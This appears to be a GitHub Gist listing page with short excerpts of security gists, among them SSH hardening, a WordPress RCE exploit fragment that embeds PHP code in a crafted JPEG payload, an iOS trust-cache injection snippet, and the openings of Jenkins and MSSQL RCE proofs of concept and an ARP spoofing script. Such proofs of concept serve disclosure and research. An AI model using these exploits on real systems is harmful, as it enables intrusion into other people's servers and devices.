lizthegrey / attributes.rb

Last active March 27, 2025 02:16

Hardening SSH with 2fa

	default['sshd']['sshd_config']['AuthenticationMethods'] = 'publickey,keyboard-interactive:pam'
	default['sshd']['sshd_config']['ChallengeResponseAuthentication'] = 'yes'
	default['sshd']['sshd_config']['PasswordAuthentication'] = 'no'

eschulte / Dockerfile

Last active April 16, 2019 16:45

	# Build souffle
	FROM ubuntu:18.04 as souffle
	RUN apt-get -y update && apt-get -y install automake bison build-essential clang doxygen flex git libtool make mcpp openjdk-8-jdk pkg-config python sqlite3 libsqlite3-dev subversion swi-prolog zlib1g-dev
	RUN git clone -b 1.4.0 https://github.com/souffle-lang/souffle
	RUN cd souffle && sh ./bootstrap
	RUN cd souffle && ./configure --prefix=/usr --enable-64bit-domain --disable-provenance
	RUN cd souffle && make -j4 install
	RUN cd souffle && cp include/souffle/RamTypes.h /usr/include/souffle/

	# Build the faulty version of UnrealIRCd

allyshka / wordpress-rce.js

Created March 1, 2019 22:51

WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943

	var wpnonce = '';
	var ajaxnonce = '';
	var wp_attached_file = '';
	var imgurl = '';
	var postajaxdata = '';
	var post_id = 0;
	var cmd = '<?php phpinfo();/*';
	var cmdlen = cmd.length
	var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
	var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);

Proteas / inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c

Last active October 22, 2023 11:31

	void inject_trusts(int pathc, const char *paths[])
	{
	printf("[+] injecting into trust cache...\n");

	extern uint64_t g_kern_base;

	static uint64_t tc = 0;
	if (tc == 0) {
	/* loaded_trust_caches
	iPhone11,2-4-6: 0xFFFFFFF008F702C8

0xhexmex / Get-KerberosKeytab.ps1

Created February 14, 2019 21:50 — forked from raandree/Get-KerberosKeytab.ps1

Parses Kerberos Keytab files

	param(
	[Parameter(Mandatory)]
	[string]$Path
	)

	#Created by [email protected]
	#
	#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
	#
	# keytab {

adamyordan / CVE-2019-1003000-Jenkins-RCE-POC.py

Last active July 29, 2019 09:29

CVE-2019-1003000-Jenkins-RCE-POC

	#!/usr/bin/python

	# Author: Adam Jordan
	# Date: 2019-02-15
	# Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
	# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)


	import argparse
	import jenkins

zelivans / t19.json

Created February 3, 2019 14:39

	{
	"defaultAction": "SCMP_ACT_ERRNO",
	"archMap": [
	{
	"architecture": "SCMP_ARCH_X86_64",
	"subArchitectures": [
	"SCMP_ARCH_X86",
	"SCMP_ARCH_X32"
	]
	},

ztothez / arp_spoof.py

Created February 2, 2019 19:54

Python Programs

	#!/usr/bin/env python

	import scapy.all as scapy
	import time
	import sys

	def get_mac(ip):
	arp_request = scapy.ARP(pdst=ip)
	broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
	arp_request_broadcast = broadcast/arp_request

3xocyte / bad_sequel.py

Last active January 11, 2024 01:42

PoC MSSQL RCE exploit using Resource-Based Constrained Delegation

	#!/usr/bin/env python

	# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
	# this is a rough PoC

	# requirements for RCE:
	# - the attacker needs to either have or create an object with a service principal name
	# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
	# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
	# - NTLM has to be in use

roycewilliams / clientside-software-update-verification-failures.md

Last active August 6, 2024 01:51

Exploitable vulnerabilities in client-side software update mechanisms that could have been mitigated by secure transport (TLS).

Client-side software update verification failures

Exploitable vulnerabilities in client-side software update mechanisms that could have been mitigated by secure transport (TLS).

Contributions welcome. All text taken from the vulnerability descriptions themselves, with additional emphasis mine.

In scope:

I consider exploitation or privilege escalation of the package tool/system itself (that would have been mitigated by secure transport) to be in scope.
Issues only described as being triggered by malicious mirrors are assumed to also be vulnerable to MITM.
Failure to verify the software update at all is currently provisionally in scope if it could have been mitigated by secure transport, but I'm waffling about it. Most of these are actual signature verification failures, and my original purpose was to highlight cases where claims of "It's OK to be HTTP because verification!" seem to me to be specious.
Software components regularly used to verify integrity in other software pipelines a